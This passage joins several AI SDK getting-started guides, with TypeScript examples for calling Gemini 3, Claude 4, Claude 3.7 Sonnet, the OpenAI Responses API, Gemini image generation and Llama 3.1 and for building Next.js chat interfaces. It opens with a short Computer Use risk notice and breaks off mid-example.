Remember, Computer Use is a beta feature. Please be aware that it poses unique risks that are distinct from standard API features or chat interfaces. These risks are heightened when using Computer Use to interact with the internet. To minimize risks, consider taking precautions such as:
- Use a dedicated virtual machine or container with minimal privileges to prevent direct system attacks or accidents.
- Avoid giving the model access to sensitive data, such as account login information, to prevent information theft.
- Limit internet access to an allowlist of domains to reduce exposure to malicious content.
- Ask a human to confirm decisions that may result in meaningful real-world consequences as well as any tasks requiring affirmative consent, such as accepting cookies, executing financial transactions, or agreeing to terms of service.
title: Get started with Gemini 3 description: Get started with Gemini 3 using the AI SDK. tags: ['getting-started']
Get started with Gemini 3
With the release of Gemini 3, Google's most intelligent model to date, there has never been a better time to start building AI applications that combine state-of-the-art reasoning with multimodal understanding.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like Gemini 3 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
Gemini 3
Gemini 3 represents a significant leap forward in AI capabilities, combining all of Gemini's strengths together to help you bring any idea to life. It delivers:
- State-of-the-art reasoning with unprecedented depth and nuance
- PhD-level performance on complex benchmarks like Humanity's Last Exam (37.5%) and GPQA Diamond (91.9%)
- Leading multimodal understanding with 81% on MMMU-Pro and 87.6% on Video-MMMU
- Best-in-class vibe coding and agentic capabilities
- Superior long-horizon planning for multi-step workflows
Gemini 3 Pro is currently available in preview, offering great performance across all benchmarks.
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Gemini 3 with the AI SDK:
import { google } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text } = await generateText({
model: google('gemini-3-pro-preview'),
prompt: 'Explain the concept of the Hilbert space.',
});
console.log(text);
Enhanced Reasoning with Thinking Mode
Gemini 3 Pro can use enhanced reasoning through thinking mode, which improves its ability to solve complex problems. You can control the thinking level using the thinkingLevel provider option:
import { google, GoogleGenerativeAIProviderOptions } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text } = await generateText({
model: google('gemini-3-pro-preview'),
prompt: 'What is the sum of the first 10 prime numbers?',
providerOptions: {
google: {
thinkingConfig: {
includeThoughts: true,
thinkingLevel: 'low',
},
} satisfies GoogleGenerativeAIProviderOptions,
},
});
console.log(text);
The thinkingLevel parameter accepts values like 'low' or 'high' to control the depth of reasoning applied to your prompt.
Using Tools with the AI SDK
Gemini 3 excels at tool calling with improved reliability and consistency for multi-step workflows. Here's an example of using tool calling with the AI SDK:
import { z } from 'zod';
import { generateText, tool, stepCountIs } from 'ai';
import { google } from '@ai-sdk/google';
const result = await generateText({
model: google('gemini-3-pro-preview'),
prompt: 'What is the weather in San Francisco?',
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
stopWhen: stepCountIs(5), // enables multi-step calling
});
console.log(result.text);
console.log(result.steps);
Using Google Search with Gemini
With search grounding, Gemini can access the latest information using Google search. Here's an example of using Google Search with the AI SDK:
import { google } from '@ai-sdk/google';
import { GoogleGenerativeAIProviderMetadata } from '@ai-sdk/google';
import { generateText } from 'ai';
const { text, sources, providerMetadata } = await generateText({
model: google('gemini-3-pro-preview'),
tools: {
google_search: google.tools.googleSearch({}),
},
prompt:
'List the top 5 San Francisco news from the past week.' +
'You must include the date of each article.',
});
// access the grounding metadata. Casting to the provider metadata type
// is optional but provides autocomplete and type safety.
const metadata = providerMetadata?.google as
| GoogleGenerativeAIProviderMetadata
| undefined;
const groundingMetadata = metadata?.groundingMetadata;
const safetyRatings = metadata?.safetyRatings;
console.log({ text, sources, groundingMetadata, safetyRatings });
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, SvelteKit, and SolidStart.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With four main hooks — useChat, useCompletion, useObject, and useAssistant — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and Gemini 3 Pro:
In a new Next.js application, first install the AI SDK and the Google Generative AI provider:
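<Snippet text={['pnpm add ai @ai-sdk/google @ai-sdk/react']} />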
Then, create a route handler for the chat endpoint:
import { google } from '@ai-sdk/google';
import { streamText, UIMessage, convertToModelMessages } from 'ai';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: google('gemini-3-pro-preview'),
messages: convertToModelMessages(messages),
});
return result.toUIMessageStreamResponse();
}
Finally, update the root page (app/page.tsx) to use the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
import { useState } from 'react';
export default function Chat() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat();
return (
<div className="flex flex-col w-full max-w-md py-24 mx-auto stretch">
{messages.map(message => (
<div key={message.id} className="whitespace-pre-wrap">
{message.role === 'user' ? 'User: ' : 'Gemini: '}
{message.parts.map((part, i) => {
switch (part.type) {
case 'text':
return <div key={`${message.id}-${i}`}>{part.text}</div>;
}
})}
</div>
))}
<form
onSubmit={e => {
e.preventDefault();
sendMessage({ text: input });
setInput('');
}}
>
<input
className="fixed dark:bg-zinc-900 bottom-0 w-full max-w-md p-2 mb-8 border border-zinc-300 dark:border-zinc-800 rounded shadow-xl"
value={input}
placeholder="Say something..."
onChange={e => setInput(e.currentTarget.value)}
/>
</form>
</div>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your AI provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Get Started
Ready to dive in? Here's how you can begin:
- Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
- Use ready-to-deploy AI templates at vercel.com/templates?type=ai.
- Read more about the Google Generative AI provider.
title: Get started with Claude 4 description: Get started with Claude 4 using the AI SDK. tags: ['getting-started']
Get started with Claude 4
With the release of Claude 4, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities and advanced intelligence.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like Claude 4 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
Claude 4
Claude 4 is Anthropic's most advanced model family to date, offering exceptional capabilities across reasoning, instruction following, coding, and knowledge tasks. Available in two variants—Sonnet and Opus—Claude 4 delivers state-of-the-art performance with enhanced reliability and control. Claude 4 builds on the extended thinking capabilities introduced in Claude 3.7, allowing for even more sophisticated problem-solving through careful, step-by-step reasoning.
Claude 4 excels at complex reasoning, code generation and analysis, detailed content creation, and agentic capabilities, making it ideal for powering sophisticated AI workflows, customer-facing agents, and applications requiring nuanced understanding and responses. Claude Opus 4 is an excellent coding model, leading on SWE-bench (72.5%) and Terminal-bench (43.2%), with the ability to sustain performance on long-running tasks that require focused effort and thousands of steps. Claude Sonnet 4 significantly improves on Sonnet 3.7, excelling in coding with 72.7% on SWE-bench while balancing performance and efficiency.
Prompt Engineering for Claude 4 Models
Claude 4 models respond well to clear, explicit instructions. The following best practices can help achieve optimal performance:
- Provide explicit instructions: Clearly state what you want the model to do, including specific steps or formats for the response.
- Include context and motivation: Explain why a task is being performed to help the model better understand the underlying goals.
- Avoid negative examples: When providing examples, only demonstrate the behavior you want to see, not what you want to avoid.
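For example, these practices might translate into a call like the following (the prompt content is illustrative):
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
  model: anthropic('claude-sonnet-4-20250514'),
  // Explicit instructions, context for why, and only positive examples
  system:
    'You are helping draft release notes for a developer tool. ' +
    'Summarize the changes as three bullet points so busy engineers can scan them quickly. ' +
    'A good bullet looks like: "- Added streaming support to the chat endpoint."',
  prompt: 'Changes: added dark mode; fixed login redirect loop; upgraded to Node 22.',
});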
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Claude 4 Sonnet with the AI SDK:
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
model: anthropic('claude-sonnet-4-20250514'),
prompt: 'How will quantum computing impact cryptography by 2050?',
});
console.log(text);
Reasoning Ability
Claude 4 enhances the extended thinking capabilities first introduced in Claude 3.7 Sonnet—the ability to solve complex problems with careful, step-by-step reasoning. Additionally, both Opus 4 and Sonnet 4 can now use tools during extended thinking, allowing Claude to alternate between reasoning and tool use to improve responses. You can enable extended thinking using the thinking provider option and specifying a thinking budget in tokens. For interleaved thinking (where Claude can think in between tool calls) you'll need to enable a beta feature using the anthropic-beta header:
import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text, reasoningText, reasoning } = await generateText({
model: anthropic('claude-sonnet-4-20250514'),
prompt: 'How will quantum computing impact cryptography by 2050?',
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 15000 },
} satisfies AnthropicProviderOptions,
},
headers: {
'anthropic-beta': 'interleaved-thinking-2025-05-14',
},
});
console.log(text); // text response
console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, SvelteKit, and SolidStart.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With four main hooks — useChat, useCompletion, useObject, and useAssistant — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and Claude Sonnet 4:
In a new Next.js application, first install the AI SDK and the Anthropic provider:
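<Snippet text={['pnpm add ai @ai-sdk/anthropic @ai-sdk/react']} />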
Then, create a route handler for the chat endpoint:
import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { streamText, convertToModelMessages, type UIMessage } from 'ai';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: anthropic('claude-sonnet-4-20250514'),
messages: convertToModelMessages(messages),
headers: {
'anthropic-beta': 'interleaved-thinking-2025-05-14',
},
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 15000 },
} satisfies AnthropicProviderOptions,
},
});
return result.toUIMessageStreamResponse({
sendReasoning: true,
});
}
Finally, update the root page (app/page.tsx) to use the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({ api: '/api/chat' }),
});
const handleSubmit = (e: React.FormEvent) => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
};
return (
<div className="flex flex-col h-screen max-w-2xl mx-auto p-4">
<div className="flex-1 overflow-y-auto space-y-4 mb-4">
{messages.map(message => (
<div
key={message.id}
className={`p-3 rounded-lg ${
message.role === 'user' ? 'bg-blue-50 ml-auto' : 'bg-gray-50'
}`}
>
<p className="font-semibold">
{message.role === 'user' ? 'You' : 'Claude 4'}
</p>
{message.parts.map((part, index) => {
if (part.type === 'text') {
return (
<div key={index} className="mt-1">
{part.text}
</div>
);
}
if (part.type === 'reasoning') {
return (
<pre
key={index}
className="bg-gray-100 p-2 rounded mt-2 text-xs overflow-x-auto"
>
<details>
<summary className="cursor-pointer">
View reasoning
</summary>
{part.text}
</details>
</pre>
);
}
})}
</div>
))}
</div>
<form onSubmit={handleSubmit} className="flex gap-2">
<input
name="prompt"
value={input}
onChange={e => setInput(e.target.value)}
className="flex-1 p-2 border rounded focus:outline-none focus:ring-2 focus:ring-blue-500"
placeholder="Ask Claude 4 something..."
/>
<button
type="submit"
className="bg-blue-500 text-white px-4 py-2 rounded hover:bg-blue-600"
>
Send
</button>
</form>
</div>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your LLM provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Claude 4 Model Variants
Claude 4 is available in two variants, each optimized for different use cases:
- Claude Sonnet 4: Balanced performance suitable for most enterprise applications, with significant improvements over Sonnet 3.7.
- Claude Opus 4: Anthropic's most powerful model and the best coding model available. Excels at sustained performance on long-running tasks that require focused effort and thousands of steps, with the ability to work continuously for several hours.
Get Started
Ready to dive in? Here's how you can begin:
- Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
- Use ready-to-deploy AI templates at vercel.com/templates?type=ai.
title: OpenAI Responses API description: Get started with the OpenAI Responses API using the AI SDK. tags: ['getting-started', 'agents']
Get started with OpenAI Responses API
With the release of OpenAI's responses API, there has never been a better time to start building AI applications, particularly those that require a deeper understanding of the world.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
OpenAI Responses API
OpenAI recently released the Responses API, a brand new way to build applications on OpenAI's platform. The new API offers a way to persist chat history, a web search tool for grounding LLM responses, a file search tool for finding relevant files, and a computer use tool for building agents that can interact with and operate computers. Let's explore how to use the Responses API with the AI SDK.
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call GPT-4o with the new Responses API using the AI SDK:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const { text } = await generateText({
model: openai.responses('gpt-4o'),
prompt: 'Explain the concept of quantum entanglement.',
});
Generating Structured Data
While text generation can be useful, you might want to generate structured JSON data. For example, you might want to extract information from text, classify data, or generate synthetic data. AI SDK Core provides two functions (generateObject and streamObject) to generate structured data, allowing you to constrain model outputs to a specific schema.
import { generateObject } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { object } = await generateObject({
model: openai.responses('gpt-4o'),
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
steps: z.array(z.string()),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
This code snippet will generate a type-safe recipe that conforms to the specified zod schema.
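Because the result is typed from the zod schema, you also get autocomplete and compile-time checks when consuming it:
// `object` is fully typed from the schema above
console.log(object.recipe.name);
console.log(object.recipe.ingredients.map(i => `${i.amount} ${i.name}`).join(', '));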
Using Tools with the AI SDK
The Responses API supports tool calling out of the box, allowing it to interact with external systems and perform discrete tasks. Here's an example of using tool calling with the AI SDK:
import { generateText, tool, stepCountIs } from 'ai';
import { openai } from '@ai-sdk/openai';
import { z } from 'zod';
const { text } = await generateText({
model: openai.responses('gpt-4o'),
prompt: 'What is the weather like today in San Francisco?',
tools: {
getWeather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
}),
},
stopWhen: stepCountIs(5), // enable multi-step 'agentic' LLM calls
});
This example demonstrates how stopWhen transforms a single LLM call into an agent. The stopWhen: stepCountIs(5) parameter allows the model to autonomously call tools, analyze results, and make additional tool calls as needed - turning what would be a simple one-shot completion into an intelligent agent that can chain multiple actions together to complete complex tasks.
Web Search Tool
The Responses API introduces a built-in tool for grounding responses called webSearch. With this tool, the model can access the internet to find relevant information for its responses.
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai.responses('gpt-4o-mini'),
prompt: 'What happened in San Francisco last week?',
tools: {
web_search_preview: openai.tools.webSearchPreview(),
},
});
console.log(result.text);
console.log(result.sources);
The webSearch tool also allows you to specify query-specific metadata that can be used to improve the quality of the search results.
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
const result = await generateText({
model: openai.responses('gpt-4o-mini'),
prompt: 'What happened in San Francisco last week?',
tools: {
web_search_preview: openai.tools.webSearchPreview({
searchContextSize: 'high',
userLocation: {
type: 'approximate',
city: 'San Francisco',
region: 'California',
},
}),
},
});
console.log(result.text);
console.log(result.sources);
Using Persistence
With the Responses API, you can persist chat history with OpenAI across requests. This allows you to send just the user's last message and OpenAI can access the entire chat history.
There are two options available to use persistence:
With previousResponseId
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result1 = await generateText({
model: openai.responses('gpt-4o-mini'),
prompt: 'Invent a new holiday and describe its traditions.',
});
const result2 = await generateText({
model: openai.responses('gpt-4o-mini'),
prompt: 'Summarize in 2 sentences',
providerOptions: {
openai: {
previousResponseId: result1.providerMetadata?.openai.responseId as string,
},
},
});
With Conversations
You can use the Conversation API to create a conversation.
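Creating the conversation happens against the OpenAI API directly, for example with the official openai package (a sketch, assuming the conversations.create method available in recent versions of that SDK):
import OpenAI from 'openai';
const client = new OpenAI();
// Create a conversation whose history OpenAI will persist across requests
const conversation = await client.conversations.create({});
console.log(conversation.id); // e.g. 'conv_123'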
Once you have created a conversation, you can continue it:
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai.responses('gpt-4o-mini'),
prompt: 'Summarize in 2 sentences',
providerOptions: {
openai: {
// The Conversation ID created via the OpenAI API to continue
conversation: 'conv_123',
},
},
});
Migrating from Completions API
Migrating from the OpenAI Completions API (via the AI SDK) to the new Responses API is simple. To migrate, simply change your provider instance from openai(modelId) to openai.responses(modelId):
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
// Completions API
const { text } = await generateText({
model: openai('gpt-4o'),
prompt: 'Explain the concept of quantum entanglement.',
});
// Responses API
const { text } = await generateText({
model: openai.responses('gpt-4o'),
prompt: 'Explain the concept of quantum entanglement.',
});
When using the Responses API, provider specific options that were previously specified on the model provider instance have now moved to the providerOptions object:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
// Completions API
const { text } = await generateText({
model: openai('gpt-4o'),
prompt: 'Explain the concept of quantum entanglement.',
providerOptions: {
openai: {
parallelToolCalls: false,
},
},
});
// Responses API
const { text } = await generateText({
model: openai.responses('gpt-4o'),
prompt: 'Explain the concept of quantum entanglement.',
providerOptions: {
openai: {
parallelToolCalls: false,
},
},
});
Get Started
Ready to get started? Here's how you can dive in:
- Explore the documentation at ai-sdk.dev/docs to understand the full capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action and get inspired for your own projects.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) and multi-modal chat at ai-sdk.dev/docs/guides.
- Check out ready-to-deploy AI templates at vercel.com/templates?type=ai.
---
title: Google Gemini Image Generation
description: Generate and edit images with Google Gemini 2.5 Flash Image using the AI SDK.
tags: ['image-generation', 'google', 'gemini']
---
Generate and Edit Images with Google Gemini 2.5 Flash
This guide will show you how to generate and edit images with the AI SDK and Google's latest multimodal language model Gemini 2.5 Flash Image.
Generating Images
As Gemini 2.5 Flash Image is a language model with multimodal capabilities, you can use the generateText or streamText functions (not generateImage) to create images. The model determines which modality to respond in based on your prompt and configuration. Here's how to create your first image:
import { generateText } from 'ai';
import fs from 'node:fs';
import 'dotenv/config';
async function generateImage() {
const result = await generateText({
model: 'google/gemini-2.5-flash-image',
prompt:
'Create a picture of a nano banana dish in a fancy restaurant with a Gemini theme',
});
// Save generated images
for (const file of result.files) {
if (file.mediaType.startsWith('image/')) {
const timestamp = Date.now();
const fileName = `generated-${timestamp}.png`;
fs.mkdirSync('output', { recursive: true });
await fs.promises.writeFile(`output/${fileName}`, file.uint8Array);
console.log(`Generated and saved image: output/${fileName}`);
}
}
}
generateImage().catch(console.error);
Here are some key points to remember:
- Generated images are returned in the result.files array
- Images are returned as Uint8Array data
- The model leverages Gemini's world knowledge, so detailed prompts yield better results
Editing Images
Gemini 2.5 Flash Image excels at editing existing images with natural language instructions. You can add elements, modify styles, or transform images while maintaining their core characteristics:
import { generateText } from 'ai';
import fs from 'node:fs';
import 'dotenv/config';
async function editImage() {
const editResult = await generateText({
model: 'google/gemini-2.5-flash-image',
prompt: [
{
role: 'user',
content: [
{
type: 'text',
text: 'Add a small wizard hat to this cat. Keep everything else the same.',
},
{
type: 'image',
// image: DataContent (string | Uint8Array | ArrayBuffer | Buffer) or URL
image: new URL(
'https://raw.githubusercontent.com/vercel/ai/refs/heads/main/examples/ai-core/data/comic-cat.png',
),
mediaType: 'image/png',
},
],
},
],
});
// Save the edited image
const timestamp = Date.now();
fs.mkdirSync('output', { recursive: true });
for (const file of editResult.files) {
if (file.mediaType.startsWith('image/')) {
await fs.promises.writeFile(
`output/edited-${timestamp}.png`,
file.uint8Array,
);
console.log(`Saved edited image: output/edited-${timestamp}.png`);
}
}
}
editImage().catch(console.error);
What's Next?
You've learned how to generate new images from text prompts and edit existing images using natural language instructions with Google's Gemini 2.5 Flash Image model.
For more advanced techniques, integration patterns, and practical examples, check out our Cookbook where you'll find comprehensive guides for building sophisticated AI-powered applications.
---
title: Get started with Claude 3.7 Sonnet
description: Get started with Claude 3.7 Sonnet using the AI SDK.
tags: ['getting-started']
---
Get started with Claude 3.7 Sonnet
With the release of Claude 3.7 Sonnet, there has never been a better time to start building AI applications, particularly those that require complex reasoning capabilities.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like Claude 3.7 Sonnet alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
Claude 3.7 Sonnet
Claude 3.7 Sonnet is Anthropic's most intelligent model to date and the first Claude model to offer extended thinking—the ability to solve complex problems with careful, step-by-step reasoning. With Claude 3.7 Sonnet, you can balance speed and quality by choosing between standard thinking for near-instant responses and extended thinking for advanced reasoning. Claude 3.7 Sonnet is state-of-the-art for coding, and delivers advancements in computer use, agentic capabilities, complex reasoning, and content generation. With frontier performance and more control over speed, Claude 3.7 Sonnet is a great choice for powering AI agents, especially customer-facing agents, and complex AI workflows.
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Claude 3.7 Sonnet with the AI SDK:
import { anthropic } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text } = await generateText({
model: anthropic('claude-3-7-sonnet-20250219'),
prompt: 'How many people will live in the world in 2040?',
});
console.log(text); // text response
The unified interface also means that you can easily switch between providers by changing just two lines of code. For example, to use Claude 3.7 Sonnet via Amazon Bedrock:
import { bedrock } from '@ai-sdk/amazon-bedrock';
import { generateText } from 'ai';
const { reasoning, text } = await generateText({
model: bedrock('anthropic.claude-3-7-sonnet-20250219-v1:0'),
prompt: 'How many people will live in the world in 2040?',
});
Reasoning Ability
Claude 3.7 Sonnet introduces extended thinking: the ability to solve complex problems with careful, step-by-step reasoning. You can enable it using the thinking provider option and specifying a thinking budget in tokens:
import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { generateText } from 'ai';
const { text, reasoningText, reasoning } = await generateText({
model: anthropic('claude-3-7-sonnet-20250219'),
prompt: 'How many people will live in the world in 2040?',
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 12000 },
} satisfies AnthropicProviderOptions,
},
});
console.log(reasoningText); // reasoning text
console.log(reasoning); // reasoning details including redacted reasoning
console.log(text); // text response
Building Interactive Interfaces
AI SDK Core can be paired with AI SDK UI, another powerful component of the AI SDK, to streamline the process of building chat, completion, and assistant interfaces with popular frameworks like Next.js, Nuxt, and SvelteKit.
AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently.
With three main hooks — useChat, useCompletion, and useObject — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.
Let's explore building a chatbot with Next.js, the AI SDK, and Claude 3.7 Sonnet:
In a new Next.js application, first install the AI SDK and the Anthropic provider:
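For example, with pnpm:
pnpm add ai @ai-sdk/anthropic @ai-sdk/react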
Then, create a route handler for the chat endpoint:
import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { streamText, convertToModelMessages, type UIMessage } from 'ai';
export async function POST(req: Request) {
const { messages }: { messages: UIMessage[] } = await req.json();
const result = streamText({
model: anthropic('claude-3-7-sonnet-20250219'),
messages: convertToModelMessages(messages),
providerOptions: {
anthropic: {
thinking: { type: 'enabled', budgetTokens: 12000 },
} satisfies AnthropicProviderOptions,
},
});
return result.toUIMessageStreamResponse({
sendReasoning: true,
});
}
Finally, update the root page (app/page.tsx) to use the useChat hook:
'use client';
import { useChat } from '@ai-sdk/react';
import { DefaultChatTransport } from 'ai';
import { useState } from 'react';
export default function Page() {
const [input, setInput] = useState('');
const { messages, sendMessage } = useChat({
transport: new DefaultChatTransport({ api: '/api/chat' }),
});
const handleSubmit = (e: React.FormEvent) => {
e.preventDefault();
if (input.trim()) {
sendMessage({ text: input });
setInput('');
}
};
return (
<>
{messages.map(message => (
<div key={message.id}>
{message.role === 'user' ? 'User: ' : 'AI: '}
{message.parts.map((part, index) => {
// text parts:
if (part.type === 'text') {
return <div key={index}>{part.text}</div>;
}
// reasoning parts:
if (part.type === 'reasoning') {
return <pre key={index}>{part.text}</pre>;
}
})}
</div>
))}
<form onSubmit={handleSubmit}>
<input
name="prompt"
value={input}
onChange={e => setInput(e.target.value)}
/>
<button type="submit">Send</button>
</form>
</>
);
}
The useChat hook on your root page (app/page.tsx) will make a request to your LLM provider endpoint (app/api/chat/route.ts) whenever the user submits a message. The messages are then displayed in the chat UI.
Get Started
Ready to dive in? Here's how you can begin:
- Explore the documentation at ai-sdk.dev/docs to understand the capabilities of the AI SDK.
- Check out practical examples at ai-sdk.dev/examples to see the SDK in action.
- Dive deeper with advanced guides on topics like Retrieval-Augmented Generation (RAG) at ai-sdk.dev/docs/guides.
- Use ready-to-deploy AI templates at vercel.com/templates?type=ai.
Claude 3.7 Sonnet opens new opportunities for reasoning-intensive AI applications. Start building today and leverage the power of advanced reasoning in your AI projects.
---
title: Get started with Llama 3.1
description: Get started with Llama 3.1 using the AI SDK.
tags: ['getting-started']
---
Get started with Llama 3.1
With the release of Llama 3.1, there has never been a better time to start building AI applications.
The AI SDK is a powerful TypeScript toolkit for building AI applications with large language models (LLMs) like Llama 3.1 alongside popular frameworks like React, Next.js, Vue, Svelte, Node.js, and more.
Llama 3.1
The release of Meta's Llama 3.1 is an important moment in AI development. As the first state-of-the-art open-weight AI model, Llama 3.1 is helping accelerate how developers build AI apps. Available in 8B, 70B, and 405B sizes, these instruction-tuned models work well for tasks like dialogue generation, translation, reasoning, and code generation.
Benchmarks
Llama 3.1 surpasses most available open-source chat models on common industry benchmarks and even outperforms some closed-source models, offering superior performance in language nuances, contextual understanding, and complex multi-step tasks. The models' refined post-training processes significantly improve response alignment, reduce false refusal rates, and enhance answer diversity, making Llama 3.1 a powerful and accessible tool for building generative AI applications.
Source: Meta AI - Llama 3.1 Model Card
Choosing Model Size
Llama 3.1 includes a new 405B parameter model, the largest open-source model available today. It is designed to handle the most complex and demanding tasks.
When choosing between the different sizes of Llama 3.1 models (405B, 70B, 8B), consider the trade-off between performance and computational requirements. The 405B model offers the highest accuracy and capability for complex tasks but requires significant computational resources. The 70B model provides a good balance of performance and efficiency for most applications, while the 8B model is suitable for simpler tasks or resource-constrained environments where speed and lower computational overhead are priorities.
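For instance, moving to the 8B model is just a model ID change (a sketch using the DeepInfra provider shown below; the classification prompt is illustrative):
import { deepinfra } from '@ai-sdk/deepinfra';
import { generateText } from 'ai';
// The 8B variant trades peak capability for speed and lower cost
const { text } = await generateText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-8B-Instruct'),
  prompt:
    'Classify this support ticket as billing, technical, or other: "I was charged twice."',
});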
Getting Started with the AI SDK
The AI SDK is the TypeScript toolkit designed to help developers build AI-powered applications with React, Next.js, Vue, Svelte, Node.js, and more. Integrating LLMs into applications is complicated and heavily dependent on the specific model provider you use.
The AI SDK abstracts away the differences between model providers, eliminates boilerplate code for building chatbots, and allows you to go beyond text output to generate rich, interactive components.
At the center of the AI SDK is AI SDK Core, which provides a unified API to call any LLM. The code snippet below is all you need to call Llama 3.1 (using DeepInfra) with the AI SDK:
import { deepinfra } from '@ai-sdk/deepinfra';
import { generateText } from 'ai';
const { text } = await generateText({
model: deepinfra('meta-llama/Meta-Llama-3.1-405B-Instruct'),
